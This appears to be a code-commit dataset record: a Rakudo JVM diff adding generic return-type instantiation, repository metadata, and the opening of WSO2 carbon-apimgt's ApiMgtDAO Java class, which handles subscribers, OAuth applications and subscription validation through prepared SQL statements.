key.getGC(tc); return BootJavaInterop.RuntimeSupport.boxJava(gcx.rakudoInterop, gcx.rakudoInterop.getSTableForClass(RakudoJavaInterop.class)); } }
[JVM] Make generics work with return type in sigs (#5080) This intends to port the changes to src/vm/moar/Perl6/Ops.nqp from https://github.com/rakudo/rakudo/pull/5048 to the JVM backend.
src/vm/jvm/runtime/org/raku/rakudo/RakOps.java
[JVM] Make generics work with return type in sigs (#5080)
<ide><path>rc/vm/jvm/runtime/org/raku/rakudo/RakOps.java <ide> return cont; <ide> } <ide> <add> private static final CallSiteDescriptor genIns = new CallSiteDescriptor( <add> new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); <ide> private static final CallSiteDescriptor rvThrower = new CallSiteDescriptor( <ide> new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); <ide> public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { <ide> SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); <ide> SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); <ide> if (rtype != null) { <add> /* The return type could be generic. In that case we have <add> * to call instantiate_generic before doing the type check. */ <add> SixModelObject HOW = rtype.st.HOW; <add> SixModelObject archetypesMeth = Ops.findmethod(HOW, "archetypes", tc); <add> Ops.invokeDirect(tc, archetypesMeth, Ops.invocantCallSite, new Object[] { HOW, rtype }); <add> SixModelObject Archetypes = Ops.result_o(tc.curFrame); <add> SixModelObject genericMeth = Ops.findmethodNonFatal(Archetypes, "generic", tc); <add> if (genericMeth != null) { <add> Ops.invokeDirect(tc, genericMeth, Ops.invocantCallSite, new Object[] { Archetypes }); <add> if (Ops.istrue(Ops.result_o(tc.curFrame), tc) == 1) { <add> SixModelObject ig = Ops.findmethod(HOW, "instantiate_generic", tc); <add> SixModelObject ContextRef = tc.gc.ContextRef; <add> SixModelObject cc = ContextRef.st.REPR.allocate(tc, ContextRef.st); <add> ((ContextRefInstance)cc).context = tc.curFrame; <add> Ops.invokeDirect(tc, ig, genIns, new Object[] { HOW, rtype, cc }); <add> rtype = Ops.result_o(tc.curFrame); <add> } <add> } <add> <ide> SixModelObject decontValue = Ops.decont(rv, tc); <ide> if (Ops.istype(decontValue, rtype, tc) == 0) { <ide> /* Straight type check failed, but it's possible we're returning
Java
apache-2.0
bed3981ca678245472725d8c1845857669803b0c
0
chamilaadhi/carbon-apimgt,praminda/carbon-apimgt,tharindu1st/carbon-apimgt,jaadds/carbon-apimgt,praminda/carbon-apimgt,tharikaGitHub/carbon-apimgt,wso2/carbon-apimgt,Rajith90/carbon-apimgt,tharindu1st/carbon-apimgt,ruks/carbon-apimgt,harsha89/carbon-apimgt,jaadds/carbon-apimgt,harsha89/carbon-apimgt,tharindu1st/carbon-apimgt,uvindra/carbon-apimgt,tharikaGitHub/carbon-apimgt,praminda/carbon-apimgt,harsha89/carbon-apimgt,jaadds/carbon-apimgt,isharac/carbon-apimgt,bhathiya/carbon-apimgt,fazlan-nazeem/carbon-apimgt,chamilaadhi/carbon-apimgt,bhathiya/carbon-apimgt,wso2/carbon-apimgt,malinthaprasan/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,fazlan-nazeem/carbon-apimgt,isharac/carbon-apimgt,bhathiya/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,prasa7/carbon-apimgt,uvindra/carbon-apimgt,uvindra/carbon-apimgt,chamilaadhi/carbon-apimgt,pubudu538/carbon-apimgt,nuwand/carbon-apimgt,nuwand/carbon-apimgt,wso2/carbon-apimgt,fazlan-nazeem/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,ruks/carbon-apimgt,tharikaGitHub/carbon-apimgt,prasa7/carbon-apimgt,tharindu1st/carbon-apimgt,ruks/carbon-apimgt,nuwand/carbon-apimgt,chamindias/carbon-apimgt,fazlan-nazeem/carbon-apimgt,chamindias/carbon-apimgt,pubudu538/carbon-apimgt,harsha89/carbon-apimgt,malinthaprasan/carbon-apimgt,bhathiya/carbon-apimgt,Rajith90/carbon-apimgt,Rajith90/carbon-apimgt,Rajith90/carbon-apimgt,malinthaprasan/carbon-apimgt,sanjeewa-malalgoda/carbon-apimgt,jaadds/carbon-apimgt,uvindra/carbon-apimgt,prasa7/carbon-apimgt,malinthaprasan/carbon-apimgt,isharac/carbon-apimgt,prasa7/carbon-apimgt,chamilaadhi/carbon-apimgt,isharac/carbon-apimgt,tharikaGitHub/carbon-apimgt,pubudu538/carbon-apimgt,pubudu538/carbon-apimgt,nuwand/carbon-apimgt,chamindias/carbon-apimgt,ruks/carbon-apimgt,chamindias/carbon-apimgt,wso2/carbon-apimgt
/* * Copyright (c) 2005-2011, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.apimgt.impl.dao; import com.google.common.base.Splitter; import com.google.common.collect.Lists; import org.apache.commons.lang.StringUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.apimgt.api.APIManagementException; import org.wso2.carbon.apimgt.api.BlockConditionAlreadyExistsException; import org.wso2.carbon.apimgt.api.SubscriptionAlreadyExistingException; import org.wso2.carbon.apimgt.api.dto.ConditionDTO; import org.wso2.carbon.apimgt.api.dto.ConditionGroupDTO; import org.wso2.carbon.apimgt.api.dto.UserApplicationAPIUsage; import org.wso2.carbon.apimgt.api.model.API; import org.wso2.carbon.apimgt.api.model.APIIdentifier; import org.wso2.carbon.apimgt.api.model.APIKey; import org.wso2.carbon.apimgt.api.model.APIProduct; import org.wso2.carbon.apimgt.api.model.APIProductIdentifier; import org.wso2.carbon.apimgt.api.model.APIProductResource; import org.wso2.carbon.apimgt.api.model.APIStatus; import org.wso2.carbon.apimgt.api.model.APIStore; import org.wso2.carbon.apimgt.api.model.AccessTokenInfo; import org.wso2.carbon.apimgt.api.model.Application; import org.wso2.carbon.apimgt.api.model.ApplicationConstants; import org.wso2.carbon.apimgt.api.model.BlockConditionsDTO; import org.wso2.carbon.apimgt.api.model.Comment; import org.wso2.carbon.apimgt.api.model.KeyManager; import org.wso2.carbon.apimgt.api.model.Label; import org.wso2.carbon.apimgt.api.model.LifeCycleEvent; import org.wso2.carbon.apimgt.api.model.OAuthAppRequest; import org.wso2.carbon.apimgt.api.model.OAuthApplicationInfo; import org.wso2.carbon.apimgt.api.model.Scope; import org.wso2.carbon.apimgt.api.model.SubscribedAPI; import org.wso2.carbon.apimgt.api.model.Subscriber; import org.wso2.carbon.apimgt.api.model.Tier; import org.wso2.carbon.apimgt.api.model.URITemplate; import org.wso2.carbon.apimgt.api.model.policy.APIPolicy; import org.wso2.carbon.apimgt.api.model.policy.ApplicationPolicy; import org.wso2.carbon.apimgt.api.model.policy.BandwidthLimit; import org.wso2.carbon.apimgt.api.model.policy.Condition; import org.wso2.carbon.apimgt.api.model.policy.GlobalPolicy; import org.wso2.carbon.apimgt.api.model.policy.HeaderCondition; import org.wso2.carbon.apimgt.api.model.policy.IPCondition; import org.wso2.carbon.apimgt.api.model.policy.JWTClaimsCondition; import org.wso2.carbon.apimgt.api.model.policy.Pipeline; import org.wso2.carbon.apimgt.api.model.policy.Policy; import org.wso2.carbon.apimgt.api.model.policy.PolicyConstants; import org.wso2.carbon.apimgt.api.model.policy.QueryParameterCondition; import org.wso2.carbon.apimgt.api.model.policy.QuotaPolicy; import org.wso2.carbon.apimgt.api.model.policy.RequestCountLimit; import org.wso2.carbon.apimgt.api.model.policy.SubscriptionPolicy; import org.wso2.carbon.apimgt.impl.APIConstants; import org.wso2.carbon.apimgt.impl.APIManagerConfiguration; import org.wso2.carbon.apimgt.impl.ThrottlePolicyConstants; import org.wso2.carbon.apimgt.impl.dao.constants.SQLConstants; import org.wso2.carbon.apimgt.impl.dto.APIInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyValidationInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APISubscriptionInfoDTO; import org.wso2.carbon.apimgt.impl.dto.ApplicationRegistrationWorkflowDTO; import org.wso2.carbon.apimgt.impl.dto.TierPermissionDTO; import org.wso2.carbon.apimgt.impl.dto.WorkflowDTO; import org.wso2.carbon.apimgt.impl.factory.KeyManagerHolder; import org.wso2.carbon.apimgt.impl.factory.SQLConstantManagerFactory; import org.wso2.carbon.apimgt.impl.internal.ServiceReferenceHolder; import org.wso2.carbon.apimgt.impl.utils.APIMgtDBUtil; import org.wso2.carbon.apimgt.impl.utils.APIUtil; import org.wso2.carbon.apimgt.impl.utils.APIVersionComparator; import org.wso2.carbon.apimgt.impl.utils.ApplicationUtils; import org.wso2.carbon.apimgt.impl.utils.LRUCache; import org.wso2.carbon.apimgt.impl.utils.RemoteUserManagerClient; import org.wso2.carbon.apimgt.impl.workflow.WorkflowConstants; import org.wso2.carbon.apimgt.impl.workflow.WorkflowExecutorFactory; import org.wso2.carbon.apimgt.impl.workflow.WorkflowStatus; import org.wso2.carbon.core.util.CryptoException; import org.wso2.carbon.identity.core.util.IdentityTenantUtil; import org.wso2.carbon.identity.core.util.IdentityUtil; import org.wso2.carbon.identity.oauth.IdentityOAuthAdminException; import org.wso2.carbon.user.core.util.UserCoreUtil; import org.wso2.carbon.utils.DBUtils; import org.wso2.carbon.utils.multitenancy.MultitenantConstants; import org.wso2.carbon.utils.multitenancy.MultitenantUtils; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.math.BigDecimal; import java.nio.charset.Charset; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.sql.Timestamp; import java.sql.Types; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.UUID; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * This class represent the ApiMgtDAO. */ public class ApiMgtDAO { private static final Log log = LogFactory.getLog(ApiMgtDAO.class); private static ApiMgtDAO INSTANCE = null; private boolean forceCaseInsensitiveComparisons = false; private boolean multiGroupAppSharingEnabled = false; private static boolean initialAutoCommit = false; private final Object scopeMutex = new Object(); private ApiMgtDAO() { APIManagerConfiguration configuration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration(); String caseSensitiveComparison = ServiceReferenceHolder.getInstance(). getAPIManagerConfigurationService().getAPIManagerConfiguration().getFirstProperty(APIConstants.API_STORE_FORCE_CI_COMPARISIONS); if (caseSensitiveComparison != null) { forceCaseInsensitiveComparisons = Boolean.parseBoolean(caseSensitiveComparison); } multiGroupAppSharingEnabled = APIUtil.isMultiGroupAppSharingEnabled(); } public List<String> getAPIVersionsMatchingApiName(String apiName, String username) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; List<String> versionList = new ArrayList<String>(); ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_VERSIONS_MATCHES_API_NAME_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, username); resultSet = ps.executeQuery(); while (resultSet.next()) { versionList.add(resultSet.getString("API_VERSION")); } } catch (SQLException e) { handleException("Failed to get API versions matches API name" + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return versionList; } /** * Method to get the instance of the ApiMgtDAO. * * @return {@link ApiMgtDAO} instance */ public static ApiMgtDAO getInstance() { if (INSTANCE == null) { INSTANCE = new ApiMgtDAO(); } return INSTANCE; } /** * Persist the details of the token generation request (allowed domains & validity period) to be used back * when approval has been granted. * * @param dto DTO related to Application Registration. * @param onlyKeyMappingEntry When this flag is enabled, only AM_APPLICATION_KEY_MAPPING will get affected. * @throws APIManagementException if failed to create entries in AM_APPLICATION_REGISTRATION and * AM_APPLICATION_KEY_MAPPING tables. */ public void createApplicationRegistrationEntry(ApplicationRegistrationWorkflowDTO dto, boolean onlyKeyMappingEntry) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement queryPs = null; PreparedStatement appRegPs = null; ResultSet resultSet = null; Application application = dto.getApplication(); Subscriber subscriber = application.getSubscriber(); String jsonString = dto.getAppInfoDTO().getOAuthApplicationInfo().getJsonString(); String registrationQuery = SQLConstants.GET_APPLICATION_REGISTRATION_SQL; String registrationEntry = SQLConstants.ADD_APPLICATION_REGISTRATION_SQL; String keyMappingEntry = SQLConstants.ADD_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); queryPs = conn.prepareStatement(registrationQuery); queryPs.setInt(1, subscriber.getId()); queryPs.setInt(2, application.getId()); queryPs.setString(3, dto.getKeyType()); resultSet = queryPs.executeQuery(); if (resultSet.next()) { throw new APIManagementException("Application '" + application.getName() + "' is already registered."); } if (!onlyKeyMappingEntry) { appRegPs = conn.prepareStatement(registrationEntry); appRegPs.setInt(1, subscriber.getId()); appRegPs.setString(2, dto.getWorkflowReference()); appRegPs.setInt(3, application.getId()); appRegPs.setString(4, dto.getKeyType()); appRegPs.setString(5, dto.getDomainList()); appRegPs.setLong(6, dto.getValidityTime()); appRegPs.setString(7, (String) dto.getAppInfoDTO().getOAuthApplicationInfo().getParameter("tokenScope")); appRegPs.setString(8, jsonString); appRegPs.execute(); } ps = conn.prepareStatement(keyMappingEntry); ps.setInt(1, application.getId()); ps.setString(2, dto.getKeyType()); ps.setString(3, dto.getStatus().toString()); ps.execute(); conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Application Registration", e1); } handleException("Error occurred while creating an " + "Application Registration Entry for Application : " + application.getName(), e); } finally { APIMgtDBUtil.closeStatement(queryPs); APIMgtDBUtil.closeStatement(appRegPs); APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } public OAuthApplicationInfo getOAuthApplication(String consumerKey) throws APIManagementException { OAuthApplicationInfo oAuthApplicationInfo = new OAuthApplicationInfo(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_OAUTH_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { oAuthApplicationInfo.setClientId(consumerKey); oAuthApplicationInfo.setCallBackURL(rs.getString("CALLBACK_URL")); oAuthApplicationInfo.setClientSecret(APIUtil.decryptToken(rs.getString("CONSUMER_SECRET"))); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_REDIRECT_URIS, rs.getString ("CALLBACK_URL")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_NAME, rs.getString("APP_NAME")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_GRANT, rs.getString("GRANT_TYPES")); } } catch (SQLException e) { handleException("Error while executing SQL for getting OAuth application info", e); } catch (CryptoException e) { handleException("Unable to decrypt consumer secret of consumer key " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return oAuthApplicationInfo; } /** * Get the creator of the OAuth App. * * @param consumerKey Client ID of the OAuth App * @return {@code Subscriber} with name and TenantId set. * @throws APIManagementException */ public Subscriber getOwnerForConsumerApp(String consumerKey) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String username; Subscriber subscriber = null; String sqlQuery = SQLConstants.GET_OWNER_FOR_CONSUMER_APP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { username = rs.getString("USERNAME"); String domainName = rs.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); subscriber = new Subscriber(endUsernameWithDomain); subscriber.setTenantId(rs.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Error while executing SQL for getting User Id : SQL " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return subscriber; } /** * Get Subscribed APIs for given userId * * @param userId id of the user * @return APIInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APIInfoDTO[] getSubscribedAPIsOfUser(String userId) throws APIManagementException { List<APIInfoDTO> apiInfoDTOList = new ArrayList<APIInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(loginUserName); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, tenantAwareUsername); ps.setInt(2, tenantId); rs = ps.executeQuery(); while (rs.next()) { APIInfoDTO infoDTO = new APIInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setVersion(rs.getString("API_VERSION")); apiInfoDTOList.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiInfoDTOList.toArray(new APIInfoDTO[apiInfoDTOList.size()]); } /** * Get API key information for given API * * @param apiInfoDTO API info * @return APIKeyInfoDTO[] * @throws APIManagementException if failed to get key info for given API */ public APIKeyInfoDTO[] getSubscribedUsersForAPI(APIInfoDTO apiInfoDTO) throws APIManagementException { APIKeyInfoDTO[] apiKeyInfoDTOs = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; List<APIKeyInfoDTO> apiKeyInfoList = new ArrayList<APIKeyInfoDTO>(); String sqlQuery = SQLConstants.GET_SUBSCRIBED_USERS_FOR_API_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(2, apiInfoDTO.getApiName()); ps.setString(3, apiInfoDTO.getVersion()); rs = ps.executeQuery(); while (rs.next()) { String userId = rs.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID); APIKeyInfoDTO apiKeyInfoDTO = new APIKeyInfoDTO(); apiKeyInfoDTO.setUserId(userId); apiKeyInfoList.add(apiKeyInfoDTO); } apiKeyInfoDTOs = apiKeyInfoList.toArray(new APIKeyInfoDTO[apiKeyInfoList.size()]); } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiKeyInfoDTOs; } /** * This method is to update the access token * * @param userId id of the user * @param apiInfoDTO Api info * @param statusEnum Status of the access key * @throws APIManagementException if failed to update the access token */ public void changeAccessTokenStatus(String userId, APIInfoDTO apiInfoDTO, String statusEnum) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(userId); int tenantId = APIUtil.getTenantId(userId); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(userId, accessTokenStoreTable); String sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_DEFAULT_SUFFIX; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_CASE_INSENSITIVE_SUFFIX; } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlQuery); ps.setString(1, statusEnum); ps.setString(2, tenantAwareUsername); ps.setInt(3, tenantId); ps.setString(4, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(5, apiInfoDTO.getApiName()); ps.setString(6, apiInfoDTO.getVersion()); int count = ps.executeUpdate(); if (log.isDebugEnabled()) { log.debug("Number of rows being updated : " + count); } conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { log.error("Failed to rollback the changeAccessTokenStatus operation", e1); } handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public boolean validateSubscriptionDetails(String context, String version, String consumerKey, APIKeyValidationInfoDTO infoDTO) throws APIManagementException { boolean defaultVersionInvoked = false; String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); //Check if the api version has been prefixed with _default_ if (version != null && version.startsWith(APIConstants.DEFAULT_VERSION_PREFIX)) { defaultVersionInvoked = true; //Remove the prefix from the version. version = version.split(APIConstants.DEFAULT_VERSION_PREFIX)[1]; } String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants .SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return false; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return false; } String apiProvider = rs.getString("API_PROVIDER"); String subTier = rs.getString("TIER_ID"); String appTier = rs.getString("APPLICATION_TIER"); infoDTO.setTier(subTier); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(apiProvider); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(appTier); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(apiProvider); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, appTier, subTier, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } return true; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } private boolean isAnyPolicyContentAware(Connection conn, String apiPolicy, String appPolicy, String subPolicy, int subscriptionTenantId, int appTenantId, int apiId) throws APIManagementException { boolean isAnyContentAware = false; // only check if using CEP based throttling. ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.IS_ANY_POLICY_CONTENT_AWARE_SQL; try { String dbProdName = conn.getMetaData().getDatabaseProductName(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiPolicy); ps.setInt(2, subscriptionTenantId); ps.setString(3, apiPolicy); ps.setInt(4, subscriptionTenantId); ps.setInt(5, apiId); ps.setInt(6, subscriptionTenantId); ps.setInt(7, apiId); ps.setInt(8, subscriptionTenantId); ps.setString(9, subPolicy); ps.setInt(10, subscriptionTenantId); ps.setString(11, appPolicy); ps.setInt(12, appTenantId); resultSet = ps.executeQuery(); // We only expect one result if all are not content aware. if (resultSet == null) { throw new APIManagementException(" Result set Null"); } int count = 0; if (resultSet.next()) { count = resultSet.getInt(1); if (count > 0) { isAnyContentAware = true; } } } catch (SQLException e) { handleException("Failed to get content awareness of the policies ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } return isAnyContentAware; } public void addSubscriber(Subscriber subscriber, String groupingId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.ADD_SUBSCRIBER_SQL; ps = conn.prepareStatement(query, new String[]{"subscriber_id"}); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); Timestamp timestamp = new Timestamp(subscriber.getSubscribedDate().getTime()); ps.setTimestamp(4, timestamp); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, timestamp); ps.setTimestamp(7, timestamp); ps.executeUpdate(); int subscriberId = 0; rs = ps.getGeneratedKeys(); if (rs.next()) { subscriberId = Integer.parseInt(rs.getString(1)); } subscriber.setId(subscriberId); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in adding new subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public void updateSubscriber(Subscriber subscriber) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.UPDATE_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); ps.setTimestamp(4, new Timestamp(subscriber.getSubscribedDate().getTime())); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setInt(7, subscriber.getId()); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in updating subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public Subscriber getSubscriber(int subscriberId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setInt(1, subscriberId); rs = ps.executeQuery(); if (rs.next()) { Subscriber subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(subscriberId); 